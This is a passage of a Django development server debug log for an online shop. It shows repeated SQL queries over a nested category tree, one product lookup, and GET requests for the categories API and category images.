"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:59:30,412 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:59:30,415 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:59:30,419 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:59:30,423 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:59:30,427 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:59:30,431 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:59:30] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:59:35] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-19 13:59:36,332 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:59:36,339 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:59:36,343 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:59:36,345 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:59:36,349 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:59:36,351 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:59:36,354 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:59:36,356 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:59:36,358 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:59:36,362 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:59:36,368 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:59:36,371 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:59:36,374 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:59:36,376 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:59:36,381 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:59:36,384 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:59:36,385 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:59:36,388 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) [19/Dec/2019 13:59:36] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:59:36,390 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:59:36,393 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:59:36,395 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:59:36,398 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:59:36,401 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:59:36,403 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:59:36,405 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:59:36,407 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:59:36,409 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:59:36,413 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:59:36,415 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:59:36,417 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:59:36,419 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:59:36,422 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:59:36,425 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:59:36,427 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:59:36,429 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:59:36,431 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:59:36,433 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:59:36,437 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:59:36,439 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:59:36,441 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:59:36,443 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:59:36,446 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:59:36,448 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:59:36,451 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:59:36,453 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:59:36,455 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:59:36,458 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:59:36,460 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:59:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:59:37] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:59:38] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:59:39] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 DEBUG 2019-12-19 13:59:44,390 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-19 13:59:44,394 utils 4252 140031503103744 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [19/Dec/2019 13:59:44] "GET /api/v1/fire/ HTTP/1.0" 200 482 [19/Dec/2019 13:59:45] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:59:47] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 13:59:48] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:59:48] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 13:59:49] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:59:50] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 13:59:51] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:59:52] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:59:53] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:59:54] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:59:55] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:59:55] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 13:59:59] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:59:59] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:59:59] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:59:59] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 14:00:03] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 14:00:03] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 DEBUG 2019-12-19 14:00:06,381 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:00:06,391 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:00:06,397 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:00:06,399 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:00:06,403 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:00:06,406 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 